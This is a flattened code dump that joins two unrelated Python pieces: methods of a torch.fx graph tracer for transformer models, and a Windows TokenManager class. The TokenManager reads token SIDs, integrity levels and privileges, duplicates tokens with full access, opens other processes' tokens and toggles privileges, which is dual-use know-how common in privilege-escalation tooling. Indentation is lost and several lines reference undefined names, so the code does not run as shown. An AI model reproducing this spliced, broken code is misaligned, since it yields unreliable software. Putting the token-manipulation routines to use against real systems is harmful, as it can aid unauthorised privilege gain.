if _IS_IN_DEBUG_MODE:
warnings.warn(f'Could not compute metadata for {kind} target {target}: {e}')
return rv
def _module_getattr(self, attr, attr_val, parameter_proxy_cache):
if getattr(self, '_disable_module_getattr', False):
return attr_val
else:
def maybe_get_proxy_for_attr(attr_val, collection_to_search, parameter_proxy_cache):
for (n, p) in collection_to_search:
if (attr_val is p):
if (n not in parameter_proxy_cache):
kwargs = {}
if ('proxy_factory_fn' in inspect.signature(self.create_proxy).parameters):
kwargs['proxy_factory_fn'] = (None if (not self.param_shapes_constant) else (lambda node: ParameterProxy(self, node, n, attr_val)))
val_proxy = self.create_proxy('get_attr', n, (), {}, **kwargs)
parameter_proxy_cache[n] = val_proxy
return parameter_proxy_cache[n]
return None
if isinstance(attr_val, torch.nn.Parameter):
maybe_parameter_proxy = maybe_get_proxy_for_attr(attr_val, self.root.named_parameters(), parameter_proxy_cache)
if (maybe_parameter_proxy is not None):
return maybe_parameter_proxy
if (self.proxy_buffer_attributes and isinstance(attr_val, torch.Tensor)):
maybe_buffer_proxy = maybe_get_proxy_for_attr(attr_val, self.root.named_buffers(), parameter_proxy_cache)
if (maybe_buffer_proxy is not None):
return maybe_buffer_proxy
return attr_val
def getattr(self, attr: str, attr_val: Any, parameter_proxy_cache: Dict[(str, Any)]):
return self._module_getattr(attr, attr_val, parameter_proxy_cache)
def call_module(self, m, forward, args, kwargs):
self.orig_forward = forward
return super().call_module(m, forward, args, kwargs)
def proxy(self, node):
return HFProxy(node, self)
def trace(self, root: Union[(torch.nn.Module, Callable[(..., Any)])], concrete_args: Optional[Dict[(str, Any)]]=None, dummy_inputs: Optional[Dict[(str, Any)]]=None, complete_concrete_args_with_inputs_not_in_dummy_inputs: bool=True) -> Graph:
sig = inspect.signature((root.forward if isinstance(root, torch.nn.Module) else root))
if (concrete_args is None):
concrete_args = {}
if ((dummy_inputs is not None) and complete_concrete_args_with_inputs_not_in_dummy_inputs):
for param in sig.parameters.values():
if (param.name in dummy_inputs):
continue
if (param.default is inspect.Parameter.empty):
raise ValueError(f'You need to specify a default value for the parameter {param.name}.')
concrete_args.update({p.name: p.default for p in sig.parameters.values() if ((p.name not in dummy_inputs) and (p.name not in concrete_args))})
input_names = (sig.parameters.keys() - concrete_args.keys())
batch_size = _generate_random_int()
sequence_length = _generate_random_int()
shape = [batch_size, sequence_length]
if (root.__class__.__name__ in get_values(MODEL_FOR_MULTIPLE_CHOICE_MAPPING_NAMES)):
num_choices = _generate_random_int(low=2, high=5)
shape.insert(1, num_choices)
inputs = (dict(dummy_inputs) if (dummy_inputs is not None) else {})
for input_name in input_names:
if (input_name in inputs):
continue
if (isinstance(root, PreTrainedModel) or type(root).__qualname__.startswith('_deserialize_graph_module')):
inputs.update(self._generate_dummy_input(root, input_name, shape))
else:
raise RuntimeError(f'Could not generate input named {input_name} for because root is not a transformers.PreTrainedModel.')
concrete_metas = {input_name: (input_.to('meta') if isinstance(input_, torch.Tensor) else input_) for (input_name, input_) in inputs.items()}
for param in sig.parameters.values():
if ((param.kind == inspect.Parameter.VAR_KEYWORD) and (param.name not in input_names)):
concrete_metas[f'**{param.name}'] = {}
self.meta_args = concrete_metas
self.patched_torch_methods = {target: _gen_constructor_wrapper(getattr(torch, target)) for target in self._TORCH_METHODS_TO_PATCH}
self.orig_fns = set()
for (name, (wrapper, orig)) in self.patched_torch_methods.items():
setattr(torch, name, wrapper)
self.orig_fns.add(orig)
try:
self.graph = super().trace(root, concrete_args=concrete_args)
finally:
for (name, (_, orig)) in self.patched_torch_methods.items():
setattr(torch, name, orig)
for node in self.graph.nodes:
if (node.op == 'placeholder'):
if (node.target in input_names):
node.args = ()
node.type = torch.Tensor
else:
to_visit = [node]
to_delete = collections.OrderedDict()
while to_visit:
n = to_visit.pop(0)
to_delete[n] = None
to_visit += list(n.users.keys())
for user in reversed(to_delete.keys()):
self.graph.erase_node(user)
if (node.op == 'output'):
node.type = None
return self.graph
def _stateless_mod_instanciation_depends_on_proxies(self, mod: nn.Module) -> bool:
return any((isinstance(attr, Proxy) for attr in mod.__dict__.values()))
def _insert_module_as_submodule(self, mod: nn.Module) -> str:
if self._stateless_mod_instanciation_depends_on_proxies(mod):
return ''
idx = 0
mod_name = mod.__class__.__name__.lower()
path = f'{mod_name}_{idx}'
already_inserted = False
while hasattr(self.root, path):
if (getattr(self.root, path) is mod):
already_inserted = True
break
path = f'{mod_name}_{idx}'
idx += 1
if (not already_inserted):
self.root.add_module(path, mod)
return path
def path_of_module(self, mod: nn.Module) -> str:
try:
return super().path_of_module(mod)
except NameError as e:
if (self.allow_insert_stateless_mods and (len(list(mod.parameters())) == 0) and (len(list(mod.buffers())) == 0)):
path = self._insert_module_as_submodule(mod)
return path
raise e
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name: str) -> bool:
return ((not self._stateless_mod_instanciation_depends_on_proxies(m)) and super().is_leaf_module(m, module_qualified_name)) |
class TokenManager():
def closeHandle(handle):
try:
CloseHandle(handle)
except Exception as e:
logging.warning('Impossible to close handle {0}: {1}'.format(handle, e))
return False
return True
def getTokenInformationTokenUser(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenUser, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
else:
logging.error('Impossible to get size for getTokenInformationTokenUser: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_USER()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenUser, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenUser: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenSid(hToken):
pToken_User = TokenManager.getTokenInformationTokenUser(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken_User.User.Sid)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
def getTokenAccountName(hToken):
pToken_User = TokenManager.getTokenInformationTokenUser(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
accName = getNameFromSid(pToken_User.User.Sid)
if (accName == None):
logging.error('Impossible to get Token SID with getNameFromSid()')
return None
return accName
def getCurrentEffectiveAccountName():
currentToken = TokenManager.getCurrentThreadEffectiveToken()
if (currentToken == None):
return None
accountName = TokenManager.getTokenAccountName(currentToken)
TokenManager.closeHandle(currentToken)
return accountName
def getTokenInformationPrimaryGroup(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenPrimaryGroup, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
else:
logging.error('Impossible to get size for getTokenInformationPrimaryGroup: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_PRIMARY_GROUP()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenPrimaryGroup, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenPrimaryGroup: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenPrimaryGroupSID(hToken):
pToken = TokenManager.getTokenInformationPrimaryGroup(hToken)
if (pToken == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken.PrimaryGroup)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
def getTokenInformationTokenOwner(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenOwner, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
else:
logging.error('Impossible to get size for getTokenInformationTokenOwner: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_OWNER()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenOwner, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenOwner: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenOwnerSid(hToken):
pToken_User = TokenManager.getTokenInformationTokenOwner(hToken)
if (pToken_User == None):
logging.error('Impossible to get Token information (SID)')
return None
sidStr = TokenManager.convertSidToStringSid(pToken_User.Owner)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
def getTokenInformationTokenLinkedToken(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenLinkedToken, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
pass
else:
logging.error('Impossible to get size for getTokenInformationTokenLinkedToken: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_LINKED_TOKEN()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenLinkedToken, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenLinkedToken: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo.LinkedToken
def getTokenInformationTokenDefaultDacl(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenDefaultDacl, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
pass
else:
logging.error('Impossible to get size for getTokenInformationTokenDefaultDacl: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_DEFAULT_DACL()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenDefaultDacl, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenDefaultDacl: {0}'.format(getLastErrorMessage()))
return None
buff = string_at(tokenInfo.DefaultDacl, infoSize.value)
dacl = ACL.from_bytes(buff, SE_OBJECT_TYPE.SE_KERNEL_OBJECT)
return dacl
def getTokenDefaultDacl(hToken):
dacl = TokenManager.getTokenInformationTokenDefaultDacl(hToken)
if (dacl == None):
return None
else:
return dacl.to_dict_list()
def getTokenInformationTokenAppContainerSid(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenAppContainerSid, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if ((errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER) or (errorMessage.winerror == ERROR_BAD_LENGTH)):
pass
elif (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return None
else:
logging.error('Impossible to get size for getTokenInformationTokenAppContainerSid: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_APPCONTAINER_INFORMATION()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenAppContainerSid, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenAppContainerSid: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenInformationAppContainerSid(hToken):
pToken = TokenManager.getTokenInformationTokenAppContainerSid(hToken)
if (pToken == None):
logging.debug('Impossible to get Token information for Container SID. Perhaps before Windows 8.')
return None
if (pToken.TokenAppContainer == None):
logging.debug('The token is not associated with an app container')
return None
sidStr = TokenManager.convertSidToStringSid(pToken.TokenAppContainer)
if (sidStr == None):
logging.error('Impossible to get Token SID with convertSidToStringSid()')
return None
return sidStr
def isAppContainerToken(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenIsAppContainer, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return False
else:
logging.error('Impossible to check isAppContainerToken(): {0}'.format(errorMessage))
return None
else:
status = tokenInfo.value
if (status > 0):
return True
elif (TokenManager.getTokenInformationTokenImpersonationLevel(hToken) == SecurityIdentification):
logging.debug('Token is not an app container token but a identification token')
return None
else:
return False
def isTokenHasRestrictions(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenHasRestrictions, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return False
else:
logging.error('Impossible to check isTokenHasRestrictions(): {0}'.format(errorMessage))
return None
else:
status = tokenInfo.value
if (status == 0):
return False
else:
return True
def getTokenInformationTokenAppContainerNumber(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenAppContainerNumber, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INVALID_PARAMETER):
return 0
else:
logging.error('Impossible to get getTokenInformationTokenAppContainerNumber: {0} (1)'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
def getTokenInformationTokenElevationType(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenElevationType, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenElevationType: {0}'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
def getTokenInformationTokenElevation(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenElevation, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenElevation: {0}'.format(getLastErrorMessage()))
return None
elif (tokenInfo.value != 0):
return True
else:
return False
def getTokenInformationTokenMandatoryPolicy(hToken):
tokenInfo = DWORD(4)
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenMandatoryPolicy, byref(tokenInfo), 4, byref(infoSize))
if (status == 0):
logging.error('Impossible to get getTokenInformationTokenMandatoryPolicy: {0}'.format(getLastErrorMessage()))
return None
else:
return tokenInfo.value
def getTokenInformationTokenSource(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenSource, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
else:
logging.warning('Impossible to get size for getTokenInformationTokenSource: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_SOURCE()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenSource, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.warning('Impossible to get getTokenInformationTokenSource: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenSourceName(hToken):
source = TokenManager.getTokenInformationTokenSource(hToken)
if (source == None):
logging.debug('Impossible to get Token source name')
return None
return source.SourceName
def convertSidToStringSid(sid):
pStringSid = LPSTR()
if (not sid):
logging.error('Sid is set to None for convertSidToStringSid()')
return None
try:
ConvertSidToStringSidA(sid, byref(pStringSid))
except Exception as e:
logging.error('impossible to convert SID to string: {0}'.format(e))
return None
sidStr = pStringSid.value.decode('utf-8')
return sidStr
def duplicateToken(hToken, impersonationLevel=SecurityImpersonation, desiredAccess=TOKEN_ALL_ACCESS, tokenType=TokenPrimary, tokenAttributes=None):
logging.debug('Duplicating token...')
hTokendupe = HANDLE(c_void_p((- 1)).value)
try:
DuplicateTokenEx(hToken, desiredAccess, tokenAttributes, impersonationLevel, tokenType, byref(hTokendupe))
except Exception as e:
logging.error('Impossible to DuplicateTokenEx in duplicateToken(): {0}'.format(e))
return None
logging.debug('Token duplicated')
return hTokendupe
def getCurrentProcessToken(desiredAccess=TOKEN_ALL_ACCESS):
hToken = HANDLE(c_void_p((- 1)).value)
try:
OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, byref(hToken))
except Exception as e:
logging.error('Impossible to Open current Process Token for getCurrentProcessToken(): {0}'.format(e))
return None
return hToken
def getObjectInfo(hObject, objectInfoClass=ObjectTypeInformation, loggingOnError=False):
theClass = None
if (objectInfoClass == ObjectTypeInformation):
theClass = PUBLIC_OBJECT_TYPE_INFORMATION
else:
logging.critical('objectTypeInformation {0} is not implemented in getObjectInfo()'.format(objectTypeInfo))
return None
buffer = theClass()
bufferSize = DWORD(sizeof(buffer))
length = DWORD(0)
status = NtQueryObject(hObject, objectInfoClass, byref(buffer), 0, length)
if (length.value > 9876):
msge = 'Impossible to get size with objectTypeInformation in getObjectInfo(): {0}'.format(length.value)
if (loggingOnError == True):
logging.error(msge)
else:
logging.debug(msge)
return None
buffer = create_string_buffer(length.value)
status = NtQueryObject(hObject, objectInfoClass, byref(buffer), length.value, length)
if (status >= STATUS_SUCCESS):
value = str(cast(buffer, POINTER(theClass)).contents.Name)
return value
else:
logging.error('Impossible to get a result with NtQueryObject(): {0}'.format(getLastErrorMessage()))
return None
def getProcessTokenOfPid(pid, tokenAcess=TOKEN_QUERY, loggingOnError=True):
hProcess = OpenProcess(MAXIMUM_ALLOWED, False, pid)
if ((hProcess == 0) or (hProcess == None)):
if (loggingOnError == True):
logging.error('Impossible to Open Process for MAXIMUM_ALLOWED on pid {0}: {1}'.format(pid, getLastErrorMessage()))
else:
logging.debug('Impossible to Open Process for MAXIMUM_ALLOWED on pid {0}: {1}'.format(pid, getLastErrorMessage()))
return None
hToken = HANDLE(c_void_p((- 1)).value)
try:
OpenProcessToken(hProcess, tokenAcess, byref(hToken))
except Exception as e:
if (loggingOnError == True):
logging.error('Impossible to Open Process Token for OpenProcessToken for {1}: {0}'.format(e, tokenAcess))
else:
logging.debug('Impossible to Open Process Token for OpenProcessToken for {1}: {0}'.format(e, tokenAcess))
TokenManager.closeHandle(hProcess)
return None
TokenManager.closeHandle(hProcess)
logging.debug('Primary token got on pid {0} with {1}'.format(pid, tokenAcess))
return hToken
def getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=True):
buf = create_string_buffer(0)
dwSize = DWORD(0)
pStringSid = LPSTR()
GetTokenInformation(hToken, TokenImpersonationLevel, byref(buf), 0, byref(dwSize))
if (dwSize == 0):
if (loggingOnError == True):
logging.error('Impossible to get size before getting ImpersonationLevel: {0}'.format(GetLastError()))
else:
logging.debug('Impossible to get size before getting ImpersonationLevel: {0}'.format(GetLastError()))
return None
buf = create_string_buffer(dwSize.value)
GetTokenInformation(hToken, TokenImpersonationLevel, byref(buf), dwSize.value, byref(dwSize))
if (dwSize == 0):
if (loggingOnError == True):
logging.error('Impossible to get ImpersonationLevel: {0}'.format(GetLastError()))
else:
logging.debug('Impossible to get ImpersonationLevel: {0}'.format(GetLastError()))
return None
impersonationLevel = cast(buf, POINTER(DWORD)).contents.value
if ((impersonationLevel < 0) or (impersonationLevel > SecurityDelegation)):
if (loggingOnError == True):
logging.error('Impossible to get ImpersonationLevel, bad int: {0}'.format(impersonationLevel))
else:
logging.debug('Impossible to get ImpersonationLevel, bad int: {0}'.format(impersonationLevel))
return None
return impersonationLevel
def isSystemToken(hToken):
sid = TokenManager.getTokenSid(hToken)
if (sid == None):
return None
if (sid == WELL_KNOW_SIDS_INV['Local System']):
return True
else:
return False
def getTokenInformationTokenType(hToken):
buffer = create_string_buffer(0)
returnLength = DWORD(0)
try:
res = GetTokenInformation(hToken, TokenType, byref(buffer), 0, returnLength)
except Exception as e:
logging.error('Impossible to get size before getting token type: {0}'.format(e))
return None
buffer = create_string_buffer(returnLength.value)
try:
res = GetTokenInformation(hToken, TokenType, byref(buffer), returnLength.value, returnLength)
except Exception as e:
logging.error('Impossible to get token type: {0}'.format(e))
return None
tokenType = cast(buffer, POINTER(DWORD)).contents.value
if (tokenType == TokenPrimary):
logging.debug('Token is TokenPrimary')
return TokenPrimary
elif (tokenType == TokenImpersonation):
logging.debug('Token is TokenImpersonation')
return TokenImpersonation
else:
logging.error('Token type unknown: {0}'.format(tokenType))
return None
def getTokenInformationTokenIntegrityLevel(hToken):
infoSize = DWORD()
status = GetTokenInformation(hToken, TokenIntegrityLevel, c_void_p(), infoSize, byref(infoSize))
if ((infoSize.value == 0) or (status == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
else:
logging.error('Impossible to get size for TokenIntegrityLevel: {0}'.format(errorMessage))
return None
tokenInfo = TOKEN_MANDATORY_LABEL()
resize(tokenInfo, infoSize.value)
status = GetTokenInformation(hToken, TokenIntegrityLevel, byref(tokenInfo), infoSize, byref(infoSize))
if (status == 0):
logging.error('Impossible to get TokenIntegrityLevel: {0}'.format(getLastErrorMessage()))
return None
return tokenInfo
def getTokenInformationTokenPrivileges(hToken):
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenPrivileges, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting privilege information: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenPrivileges, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get privilege information: {0}'.format(e))
return None
privileges = ctypes.cast(buffer, POINTER(TOKEN_PRIVILEGES)).contents
return privileges
def isImpersonationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityImpersonation):
return True
else:
return False
def isDelegationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityDelegation):
return True
else:
return False
def isIdentificationToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityIdentification):
return True
else:
return False
def isAnonymousToken(hToken, loggingOnError=True):
level = TokenManager.getTokenInformationTokenImpersonationLevel(hToken, loggingOnError=loggingOnError)
if (level == None):
return False
elif (level == SecurityAnonymous):
return True
else:
return False
def getTokenIntegrityLevel(hToken):
integrityLvlInfo = TokenManager.getTokenInformationTokenIntegrityLevel(hToken)
if (integrityLvlInfo == None):
return None
sidString = TokenManager.convertSidToStringSid(integrityLvlInfo.Label.Sid)
logging.debug('SID: {0}'.format(sidString))
pSidSize = GetSidSubAuthorityCount(integrityLvlInfo.Label.Sid)
res = GetSidSubAuthority(integrityLvlInfo.Label.Sid, (pSidSize.contents.value - 1))
level = res.contents.value
logging.debug('Integrity level Value from handle: {0}'.format(level))
return level
def getTokenIntegrityLevelAsString(hToken):
level = TokenManager.getTokenIntegrityLevel(hToken)
intLvlString = MAPPING_INTEGRITY_LEVEL.get(level)
logging.debug('Integrity Level from handle: {0} ({1})'.format(intLvlString, level))
return intLvlString
def getTokenInformationTokenGroups(hToken):
allGroups = []
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenGroups, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting Token Groups: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenGroups, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get Token Groups: {0}'.format(e))
return None
groupsCount = cast(buffer, POINTER(ULONG))[0]
groups = cast(buffer, POINTER(tokenGroups(groupsCount)))[0]
for i in range(groups.GroupCount):
aGroup = groups.Groups[i]
allGroups.append(aGroup)
return allGroups
def getTokenInformationTokenSessionId(hToken):
returnLength = DWORD()
res = GetTokenInformation(hToken, TokenSessionId, None, 0, returnLength)
if (returnLength == 0):
logging.error('Impossible to get size before getting TokenSession Id: {0}'.format(GetLastError()))
return None
buffer = create_string_buffer(returnLength.value)
res = GetTokenInformation(hToken, TokenSessionId, byref(buffer), returnLength.value, returnLength)
if (returnLength == 0):
logging.error('Impossible to get TokenSession Id: {0}'.format(e))
return None
id = cast(buffer, POINTER(DWORD)).contents.value
return id
def getTokenInformationTokenLogonSid(hToken):
infoSize = DWORD(0)
status = GetTokenInformation(hToken, TokenLogonSid, c_void_p(), 0, byref(infoSize))
if ((status == 0) or (infoSize.value == 0)):
errorMessage = getLastErrorMessage()
if (errorMessage.winerror == ERROR_INSUFFICIENT_BUFFER):
pass
if (errorMessage.winerror == ERROR_NOT_FOUND):
logging.debug('Impossible to get size for getTokenLogonSid: {0}'.format(errorMessage))
return None
else:
logging.debug('Impossible to get size for getTokenLogonSid: {0}'.format(errorMessage))
return None
buffer = create_string_buffer(infoSize.value)
status = GetTokenInformation(hToken, TokenLogonSid, byref(buffer), infoSize, byref(infoSize))
if (status == 0):
logging.debug('Impossible to get getTokenLogonSid: {0}'.format(getLastErrorMessage()))
return None
groupsCount = cast(buffer, POINTER(ULONG))[0]
groups = cast(buffer, POINTER(tokenGroups(groupsCount)))[0]
return groups
def getAllUserRightsForEffectiveToken():
hToken = TokenManager.getCurrentThreadEffectiveToken()
if (hToken == None):
return None
privs = TokenManager.getAllUserRights(hToken)
TokenManager.closeHandle(hToken)
return privs
def printAllEffectiveUserRights(printOnDebug=False):
info = TokenManager.getAllUserRightsForEffectiveToken()
if (info == None):
logging.error('Impossible to print all User Rights (privileges) associated with the current thread')
return None
m = 'Privileges (User Rights) for current thread:'
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
for aPriv in info:
if (info[aPriv] & SE_PRIVILEGE_ENABLED):
m = '- {0}: Enabled'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
elif (info[aPriv] & SE_PRIVILEGE_ENABLED_BY_DEFAULT):
m = '- {0}: Enabled by default'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
else:
m = '- {0}: Disabled'.format(aPriv)
if (printOnDebug == True):
logging.debug(m)
else:
print(m)
return True
def getAllUserRights(hToken):
privDict = {}
if (hToken == None):
logging.error('Impossible to Get all User Rights, hToken is set to None')
return None
privileges = TokenManager.getTokenInformationTokenPrivileges(hToken)
if (privileges == None):
logging.error('Impossible to Get all User Rights')
return None
logging.debug('Number of privileges: {0}'.format(privileges.PrivilegeCount))
for aPriv in privileges:
privName = aPriv.getName()
privDict[privName] = aPriv.Attributes
return privDict
def getAllUserRightsForPrimaryToken():
hToken = TokenManager.getCurrentProcessToken()
if (hToken == None):
return None
privs = TokenManager.getAllUserRights(hToken)
TokenManager.closeHandle(hToken)
return privs
def getUserRightStatus(hToken, userRightName):
userRightsDict = TokenManager.getAllUserRights(hToken)
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightStatusForPrimaryToken(userRightName):
userRightsDict = TokenManager.getAllUserRightsForPrimaryToken()
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightStatusForEffectiveToken(userRightName):
userRightsDict = TokenManager.getAllUserRightsForEffectiveToken()
if (userRightsDict == None):
return None
if (userRightName in userRightsDict):
return userRightsDict[userRightName]
else:
return None
def getUserRightsEnabledForPrimaryToken():
userRightsEnabled = []
userRightsDict = TokenManager.getAllUserRightsForPrimaryToken()
if (userRightsDict == None):
return None
for aUserRightName in userRightsDict:
if (bool((userRightsDict[aUserRightName] & SE_PRIVILEGE_ENABLED)) == True):
userRightsEnabled.append(aUserRightName)
logging.debug('User Rights enabled for current process: {0}'.format(userRightsEnabled))
return userRightsEnabled
def getUserRightsEnabledForEffectiveToken():
userRightsEnabled = []
userRightsDict = TokenManager.getAllUserRightsForEffectiveToken()
if (userRightsDict == None):
return None
for aUserRightName in userRightsDict:
if (bool((userRightsDict[aUserRightName] & SE_PRIVILEGE_ENABLED)) == True):
userRightsEnabled.append(aUserRightName)
logging.debug('User Rights enabled for current process: {0}'.format(userRightsEnabled))
return userRightsEnabled
def enableUserRight(privilegeStr, hToken=None):
if (hToken == None):
logging.debug('Trying to enable the User Right {0} on effective token...'.format(repr(privilegeStr)))
allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
else:
logging.debug('Trying to enable the User Right {0} on chosen token...'.format(repr(privilegeStr)))
allUserRights = self.getAllUserRights(hToken)
if (allUserRights == None):
return False
if (privilegeStr not in allUserRights):
logging.info('Current token has not the right {0}, impossible to enable it'.format(repr(privilegeStr)))
return False
if (bool((allUserRights[privilegeStr] & SE_PRIVILEGE_ENABLED)) == True):
logging.debug('User Right {0} is already enabled on token, nothing to do'.format(privilegeStr))
return True
if (hToken == None):
dAcess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAcess, desiredAccessProcess=dAcess)
else:
theTokenToMod = hToken
status = TokenManager.adjustTokenPrivileges(theTokenToMod, privilegeStr, state=SE_PRIVILEGE_ENABLED)
if (hToken == None):
TokenManager.closeHandle(theTokenToMod)
return status
def disableAllUserRights(hToken=None):
if (hToken == None):
logging.debug('Trying to disable all User Rights on effective token...')
allUserRights = TokenManager.getAllUserRightsForEffectiveToken()
dAcess = (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY)
theTokenToMod = TokenManager.getCurrentThreadEffectiveToken(desiredAccessThread=dAcess, desiredAccessProcess=dAcess)
else:
logging.debug('Trying to disable all User Rights on chosen token...')
allUserRights = self.getAllUserRights(hToken)
theTokenToMod = hToken
for aPrivName in allUserRights:
if (bool((allUserRights[aPrivName] & SE_PRIVILEGE_ENABLED)) == True):
status = TokenManager.adjustTokenPrivileges(theTokenToMod, aPrivName, state=SE_PRIVILEGE_REMOVED)
if (hToken == None):
TokenManager.closeHandle(theTokenToMod)
return True
